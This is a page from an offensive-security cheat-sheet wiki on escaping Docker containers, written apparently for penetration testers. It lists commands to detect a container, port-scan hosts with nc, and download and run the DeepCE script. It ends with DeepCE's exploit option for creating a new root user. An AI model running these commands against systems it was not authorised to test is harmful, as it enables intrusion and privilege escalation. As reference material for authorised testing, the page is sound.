Red Squad
search
⌘Ctrlk
BuyMeACoffee
Red Squad
  • 🏠/home/red-squad
  • 🌐Web Hacking
    • 🚩CTFs shortcuts
    • πŸ—ΊοΈAudits plan
    • πŸ•΅οΈOSINT
    • calculatorEnumeration
    • πŸ”—HTTP Stuff
    • πŸ”Sessions / Tokens
    • πŸ’‰Injections
    • πŸͺ±Web Vulnerabilities
    • β›”WAF Bypass
    • ✍️Servers / CMS
    • πŸ–‡οΈAPI
  • 🐧Linux Hacking
    • πŸ§—Privilege Escalation
    • πŸ‘£Cover tracks
    • πŸšͺBackdoors
    • β­•Reverse Shells
    • πŸ”’Compiled Binaries
    • 🌊Buffer Overflow
    • 🐳Docker Escape
    • 🀝File sharing
  • πŸͺŸWindows Hacking
    • πŸ‘₯Active Directory
    • πŸ’‘Useful AD Commands
    • πŸ§—Privilege Escalation
    • 🐚Shells
    • πŸ”“Bypasses
    • πŸ“ƒOffice
    • πŸ‘©β€πŸ’»SCCM | MECM
    • πŸ’ŽMicrosoft 365
  • πŸ’½Systems
    • πŸ•β€πŸ¦ΊServices Enumeration
    • πŸ–¨οΈPrinters
    • πŸ›‘οΈFortinet
    • πŸ“ΉCCTV / IP Cameras
  • πŸŽ†Networks
    • πŸŒͺ️Pivoting
    • πŸ”₯Firewalls
    • πŸ”—Proxies
  • πŸ“±Mobile Hacking
    • πŸ€–Android
    • 🍏iOS
    • πŸ“ΊIOT
  • Configuration
    • ChromeOS
    • Mobile
    • IBM
  • πŸ“‘Wireless Hacking
    • πŸŽ†Wi-Fi Attacks
    • 🫐Bluetooth
  • πŸ‘¨β€πŸ’»Code Audit
    • βœ”οΈBest Practices
    • ❌Bad Practices
    • βš’οΈTools
  • πŸ‘Thick Client Hacking
    • πŸ“Thick Client Pentesting Methodology
    • πŸ—„οΈResources
  • πŸ—„οΈMISC
    • πŸ”‘Default Credentials
    • πŸ”»CVEs
    • 🦊Browser Extensions
    • πŸ€–AI
    • πŸ”­Hacking Labs
    • πŸ”«Exploitation Frameworks
  • πŸ•΅οΈOPSEC
    • πŸ—οΈPrivacy
  • πŸ”‘CRACKING | ENCODING
    • πŸ₯ŠBruteforce tools
    • πŸ“Wordlists
    • 🧨Cracking Tools
    • πŸ”¬Encoding | Decoding Tools
    • πŸ”Steganography | Cipher
  • πŸ”΄RED TEAM
    • πŸ“₯Password Extract
    • πŸ•΅οΈSpy cam
    • πŸ”’Lock Picking
    • 🎣Phishing
  • πŸŒ€Whistle Blowing
    • πŸ“ΉCCTV
  • πŸ”΅BLUE TEAM
    • 🧩Forensics
    • 🦹Malware Analysis
    • πŸ› οΈTools
    • 🍯HoneyPots
    • πŸŽ†Networks Security
    • πŸͺ™Online IoC Scanners
  • 🐞Bug Bounty Related
    • Searching for CVEs
    • [FR] Legal
    • Dorks
  • πŸ–₯️DEVELOPERS
    • πŸ‘¨β€πŸ’»IDE
  • πŸ“šLEARNING
    • Windows
    • SQL
    • SSL/TLS
gitbookPowered by GitBook
block-quoteOn this pagechevron-down
githubEdit
  1. 🐧Linux Hacking

🐳Docker Escape

LogoDocker Security - OWASP Cheat Sheet Seriescheatsheetseries.owasp.orgchevron-right

hashtag
Know you're in a docker

ps aux
cd / && ls -lah
# if .dockerenv then ...

cat /proc/1/cgroup

hashtag
Escape

hashtag
Resources

https://unit42.paloaltonetworks.com/docker-patched-the-most-severe-copy-vulnerability-to-date-with-cve-2019-14271/unit42.paloaltonetworks.comchevron-right
Docker Patched the Most Severe Copy Vulnerability to Date With CVE-2019-14271

hashtag
DeepCE

LogoGitHub - stealthcopter/deepce: Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)GitHubchevron-right
PreviousExploitschevron-leftNextFile sharingchevron-right

Last updated 2 years ago

  • Know you're in a docker
  • Escape
  • Resources
arp -a
# other hosts ???
# scan open ports
nc -zv 127.0.0.1 1-65535
nc -zv $host 1-65535

# check for db and other stuff....
wget https://github.com/stealthcopter/deepce/raw/main/deepce.sh
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -o deepce.sh
# Or using python requests
python -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content)' > deepce.sh 
python3 -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content.decode("utf-8"))' > deepce.sh

# start
chmod +x ./deepce.sh
./deepce.sh

# create new root user on system
./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce